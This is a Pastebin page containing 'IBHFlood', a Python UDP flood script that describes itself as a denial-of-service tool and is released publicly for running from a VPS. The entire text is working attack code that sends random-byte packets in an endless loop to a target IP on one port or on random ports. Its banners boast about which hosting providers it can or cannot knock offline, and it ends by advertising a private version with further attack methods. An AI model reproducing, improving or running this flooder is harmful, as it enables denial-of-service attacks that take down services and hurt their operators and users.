Advertisement
ThaRealUDP

IBH Gang's VPS UDP Script. *STRONG* Public Release

Oct 18th, 2016
231
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.93 KB | None | 0 0
  1. #!/usr/bin/python
  2.  
  3. import threading
  4. import time
  5. import socket #Imports needed libraries
  6. import random
  7. import sys
  8. import os
  9. import argparse
  10. from random import randint
  11. from datetime import datetime
  12.  
  13. #USAGE
  14. # python IBHFlood.py
  15. # -ip (IP) - Targets Address
  16. # -port (PORT) Usually Port 80
  17. # -size (Use 65500) Bytes per second.
  18.  
  19. W = '\033[0m' # white (normal)
  20. R = '\033[31m' # red
  21. G = '\033[32m' # green
  22. O = '\033[33m' # orange
  23. B = '\033[34m' # blue
  24. P = '\033[35m' # purple
  25. C = '\033[36m' # cyan
  26. GR = '\033[37m' # gray
  27. T = '\033[93m' # tan
  28.  
  29. rando = randint(1, 10)
  30. if rando == 1 or rando == 2 or rando == 3 or rando == 4 or rando == 5 or rando == 6 or rando == 7:
  31. title = "First"
  32. else:
  33. title = "Second"
  34. #print rando
  35. randy = randint(1, 20)
  36. if randy == 1:
  37. motd = "Made for a VPS... Don't be stupid with it."
  38. else:
  39. motd = "Coded in Python3."
  40. parser = argparse.ArgumentParser(description='IBHFlood: Denial of service tool. To maximize efficiency, it is recommended to run this from a VPS')
  41. parser.add_argument('-port', action="store",dest='port', type=int, required=False, help='Target Port(No argument means all ports)')
  42. parser.add_argument('-ip', action="store",dest='addr', required=False, help='Target Address')
  43. parser.add_argument('-size', action="store",dest='size', required=False, help='Packet size in bytes(No argument means 1024 bytes)')
  44. args = parser.parse_args()
  45. if title == "First":
  46. print(''+R+'')
  47. print('''
  48. ##################################
  49. # IBH PuTTy Python Flooder #
  50. # Scripted Using a DPHRAGM #
  51. # Socket (RAWUDP) #
  52. ##################################
  53. # This Can not down The following#
  54. # CloudFlare #
  55. # OVH #
  56. # BlazingFast #
  57. # Amazon Technologies #
  58. # Akamai Servers #
  59. # Payed for Google Plans #
  60. # NFO Servers #
  61. # ################################
  62. # If you find more hosts that #
  63. # This cannot Down, Notify me #
  64. # Skype #
  65. #________________________________#
  66. # dan.siebles.federal.agent #
  67. ##################################
  68. # Usage #
  69. #________________________________#
  70. # python IBHFlood.py #
  71. # -ip (IP) -p (PORT) -size (SIZE)#
  72. ##################################
  73.  
  74. ''')
  75. print(''+W+'['+R+'!'+W+'] '+G+'Developed By: '+R+'dan.siebles.federal.agent'+G+'')
  76. print(''+W+'['+R+'!'+W+'] '+P+'' + motd + ''+G+'')
  77. print(''+W+'['+R+'!'+W+'] '+O+'AND...THEY\'RE GONE'+G+'')
  78. print(''+W+'['+R+'!'+W+'] '+G+'This was developed for use on a '+R+'VPS'+G+'')
  79. print(''+W+'['+R+'!'+W+'] '+G+'Follow '+R+'dan.siebles.federal.agent'+G+' on skype for other tools or if you liked this tool'+W+'')
  80. print(''+W+'['+R+'!'+W+'] '+O+'*Classy AF*'+W+'')
  81.  
  82. elif title == "Second":
  83. print(''+R+'')
  84. print('''
  85. ##################################
  86. # IBH PuTTy Python Flooder #
  87. # Scripted Using a DPHRAGM #
  88. # Socket (RAWUDP) #
  89. ##################################
  90. # This Can not down The following#
  91. # CloudFlare #
  92. # OVH #
  93. # BlazingFast #
  94. # Amazon Technologies #
  95. # Akamai Servers #
  96. # Payed for Google Plans #
  97. # NFO Servers #
  98. # ################################
  99. # If you find more hosts that #
  100. # This cannot Down, Notify me #
  101. # Skype #
  102. #________________________________#
  103. # dan.siebles.federal.agent #
  104. ##################################
  105. # Usage #
  106. #________________________________#
  107. # python IBHFlood.py #
  108. # -ip (IP) -p (PORT) -size (SIZE)#
  109. ##################################
  110. ''')
  111. print(''+R+' Tool Made By: '+O+' TCP#IBH')
  112. sent=0
  113. sock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) #Creates a socket
  114. if args.size:
  115. size = args.size
  116. bytes = random._urandom((int(args.size)-64)+64) #Creates packet
  117. else:
  118. size = 1024
  119. bytes=random._urandom((1024-64)+64) #Creates packet
  120. ip=args.addr
  121. #port=input('Port: ') #Port we direct to attack
  122. t1 = datetime.now()
  123. if args.port:
  124. port=args.port
  125. resp = (''+R+'port '+O+'' + str(args.port))
  126. # print ('['+R+'!'+W+'] Sending packets to '+R+'' + ip + ''+W+' : Stop with Ctrl+C')
  127. else:
  128. port=1
  129. resp = (''+O+'all '+R+'ports')
  130. if title == "First":
  131. print ('['+R+'!'+W+'] Sending packets to '+R+'' + ip + ''+W+' : Stop with Ctrl+C')
  132. else:
  133. print (''+R+'----------Sending '+O+'' + str(size) + ''+R+' byte packets to '+O+'' + args.addr + ''+R+' on '+O+'' + resp + ''+R+'----------'+W+'')
  134. print
  135. try:
  136. while 1: #Infinitely loops sending packets to the port until the program is exited.
  137. #print(bytes)
  138. if args.port:
  139. #print(port)
  140. port = args.port
  141. else:
  142. if port == 65535:
  143. port=1
  144. port = randint(1, 65500)
  145. #print (port)
  146. sock.sendto(bytes,(ip,port))
  147. #UNCOMMENT THE NEXT LINE FOR PYTHON2.*
  148. #print('['+G+'+'+W+'] Packets sent: ' + str(sent))
  149. #UNCOMMENT THE NEXT LINE FOR PYTHON3.*
  150. #print('['+G+'+'+W+'] Packets sent: ' + str(sent), end="\r")
  151. #print "Sent %s amount of packets to %s at port %s." % (sent,ip,port)
  152. sent= sent + 1
  153. #if args.port:
  154. # port=args.port
  155. #else:
  156. # port=port+1
  157. except KeyboardInterrupt:
  158. t2 = datetime.now()
  159. t3 = t2 - t1
  160. print('')
  161. if title == "First":
  162. print ('['+G+'+'+W+'] Sent '+G+'' + str(sent) + ''+W+' packets to '+R+'' + ip + ''+W+' in '+P+'' + str(t3) + ''+W+'')
  163. else:
  164. print (''+R+'----------Sent '+O+'' + str(sent) + ''+R+' packets to '+O+'' + ip + ''+R+' in '+O+'' + str(t3) + ''+R+'----------'+W+'')
  165. print
  166. print (motd)
  167.  
  168. #Looking for the Private Version with Layer 7 Methods?
  169. #Add Me on skype! user.datagram.protocol
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement